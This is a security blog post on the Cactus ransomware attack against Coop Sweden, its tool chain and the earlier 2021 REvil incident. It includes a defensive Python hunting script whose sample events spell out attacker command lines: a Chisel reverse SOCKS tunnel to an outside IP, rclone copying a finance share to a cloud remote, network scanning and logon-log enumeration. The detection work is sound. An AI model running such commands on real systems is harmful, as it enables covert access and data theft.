Swedish Coop Group fell victim to Cactus ransomware in December 2023

The Swedish Coop supermarket group has probably fallen victim to another cyberattack. A few days ago I read that the Cactus ransomware group, which has been active since 2023, had listed Coop as a victim on its Tor leak site. Coop has since confirmed that ransomware hit the stores in the Värmland region. Back in 2021, 800 Coop stores in Sweden had to stop trading because a cyberattack on their checkout provider had paralyzed the tills.



Who is Coop?

Coop Sweden is a Swedish supermarket chain organized as a cooperative and accounts for a good 20% of sales in this sector. Coop operates around 800 stores, which are co-owned by 3.5 million members of 29 consumer associations. All surpluses the company generates are returned to the members or reinvested in the business, creating a virtuous circle.

Coop victim of the Cactus Group

On January 1, 2024, I came across the information in the following tweet that the Cactus ransomware group had listed Coop as a victim on its Tor leak page.

The Cactus group writes that Coop has a turnover of 6.5 billion US dollars in Sweden and that 257 GB of data were captured in the attack; 1% of this has been published on the leak page as proof. Security Affairs writes in the article linked in the tweet above that the Cactus ransomware group claims to have hacked Coop in Sweden and threatens to expose personal files from over 21,000 directories.

The Cactus ransomware group

The Cactus ransomware group has only been active since March 2023 (see Bleeping Computer), but seems to have "picked up speed" at the end of 2023. This article from December 2023 reports that Microsoft is warning about Cactus ransomware, and Arctic Wolf published this article in November 2023 about a newly observed campaign by the group.



According to Security Affairs, the Cactus operators rely on several legitimate remote-management tools (e.g. Splashtop, AnyDesk, SuperOps RMM) to obtain remote access to a company's network. Once the malware is running on a machine with sufficient privileges, a batch script uninstalls the anti-virus products installed on it.

The operators then use the SoftPerfect Network Scanner (netscan) to find further targets on the network, and enumerate endpoints with PowerShell commands. User accounts are identified by looking at successful logons in the Windows Event Viewer. For post-exploitation activity the group also uses a modified variant of the open-source tool PSnmap, Cobalt Strike and the tunneling tool Chisel. Data is exfiltrated with Rclone, and a PowerShell script called TotalExec (previously used by the BlackBasta operators to automate the rollout of the encryptor) is used to deploy the encryption.
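The tool chain described above is a useful hunting checklist. As an added example that is not part of the original post or of any vendor write-up, the following Python script runs a few simple rules over constructed Windows process-creation records (the event shape, host names, file paths and command lines are all invented for the example) and correlates them per host. Each rule maps one of the named tools to an intrusion stage: the RMM clients, netscan, Chisel, Rclone copying to a remote (rather than a local path), and logon enumeration via the Security log. The assumption that "successful logons in the Event Viewer" means queries for Event ID 4624 is mine, not the post's. Any single hit is noisy (help desks use AnyDesk, backup jobs use Rclone), so the script only reports hosts on which several distinct stages appear together.

```python
"""Hunt constructed process-creation events for the Cactus tool chain and
correlate hits per host. Sample data is made up for this example."""
import re
from collections import defaultdict

# Tools named in the post, keyed by the stage they serve. Matched on image name.
TOOL_SIGNATURES = {
    "remote_access": ("splashtop", "anydesk", "superops"),
    "discovery": ("netscan",),
    "tunnel_or_c2": ("chisel",),
}

# An rclone argument of the form "remote:path" (a word of 2+ chars before the
# colon, so drive letters such as D:\ do not match). Assumption: a copy/sync
# to a named remote is the exfiltration pattern worth flagging.
RCLONE_REMOTE_RE = re.compile(r"\s[a-z0-9_-]{2,}:")

# Command-line tools that read the Security log; 4624 = successful logon
# (my mapping of "successful logins in the Event Viewer", not the post's).
LOGON_READERS = ("wevtutil", "get-winevent", "get-eventlog")

# Constructed sample events: one fully compromised workstation, a backup
# server doing a local rclone copy, and a help-desk AnyDesk session.
SAMPLE_EVENTS = [
    {"host": "WS-017", "user": r"CORP\jdoe",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --service"},
    {"host": "WS-017", "user": r"CORP\jdoe",
     "image": r"C:\Users\jdoe\AppData\Local\Temp\netscan.exe",
     "cmdline": "netscan.exe /hide /auto:result.xml /range:10.10.0.1-10.10.255.254"},
    {"host": "WS-017", "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": 'wevtutil qe Security /q:"*[System[(EventID=4624)]]" /c:200 /f:text'},
    {"host": "WS-017", "user": r"CORP\jdoe",
     "image": r"C:\ProgramData\chisel.exe",
     "cmdline": "chisel.exe client 203.0.113.10:8080 R:socks"},
    {"host": "WS-017", "user": r"CORP\jdoe",
     "image": r"C:\ProgramData\rclone.exe",
     "cmdline": r"rclone.exe copy \\FS01\Finance mega:coop-finance --transfers 32"},
    {"host": "FS-01", "user": r"CORP\backup-svc",
     "image": r"C:\Tools\rclone\rclone.exe",
     "cmdline": r"rclone.exe sync D:\Backups E:\Backups"},
    {"host": "WS-042", "user": r"CORP\asmith",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --control"},
]


def classify(event):
    """Return the set of intrusion stages a single process-creation event hits."""
    image = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"].lower()
    stages = set()
    for stage, names in TOOL_SIGNATURES.items():
        if any(name in image for name in names):
            stages.add(stage)
    if any(reader in cmd for reader in LOGON_READERS) and "4624" in cmd:
        stages.add("account_discovery")
    if "rclone" in image and RCLONE_REMOTE_RE.search(cmd):
        stages.add("exfiltration")
    return stages


def hunt(events):
    """Aggregate stages per host; hosts with no hits are omitted."""
    per_host = defaultdict(set)
    for event in events:
        stages = classify(event)
        if stages:
            per_host[event["host"]] |= stages
    return {host: sorted(stages) for host, stages in per_host.items()}


def suspicious_hosts(events, min_stages=3):
    """Hosts on which at least min_stages distinct stages were observed."""
    return sorted(host for host, stages in hunt(events).items()
                  if len(stages) >= min_stages)


if __name__ == "__main__":
    for host, stages in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
    print("escalate:", suspicious_hosts(SAMPLE_EVENTS))
```

With the sample data only WS-017 is escalated: the backup server's local rclone run never matches the remote pattern, and the single AnyDesk session on WS-042 stays a one-stage hit. In a real environment you would feed the same functions from Sysmon Event ID 1 or Security Event ID 4688 exports and tune the image lists to your own RMM inventory.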

Coop confirms the attack

The Retail Insights Network wrote on January 3, 2024 that Coop Sweden has confirmed the cyberattack by Cactus. The attack began on December 22, 2023 and left all Coop stores in Värmland unable to process card payments. Coop operates 44 supermarkets, 15 Pekås and two MaxiMat stores in Värmland. The stores nevertheless remained open.

A Coop spokesperson was quoted by Recorded Future News as saying, "We can confirm that Coop Värmland has been the victim of a cyberattack." After the attack was discovered, external experts were brought in, focusing primarily on closing the vulnerabilities. According to Coop's current assessment, the vulnerabilities through which the attackers got in have been successfully fixed.

The 2021 attack

I remembered the Coop cyberattack from summer 2021, which I reported on in the blog post Coop-Sweden closes 800 stores after Kaseya VSA supply chain attack by REvil gang. At the time, the REvil ransomware group had compromised the provider Kaseya VSA in a supply chain attack, and through it the checkout service provider Visma EssCom used by Coop. In the end, the tills in the 800 Coop stores stopped working, so no payments could be taken. In Sweden, where hardly anyone carries cash anymore, that is quite a drama.

Similar:
Coop-Sweden closes 800 stores after Kaseya VSA supply chain attack by REvil gang



This entry was posted in Security.
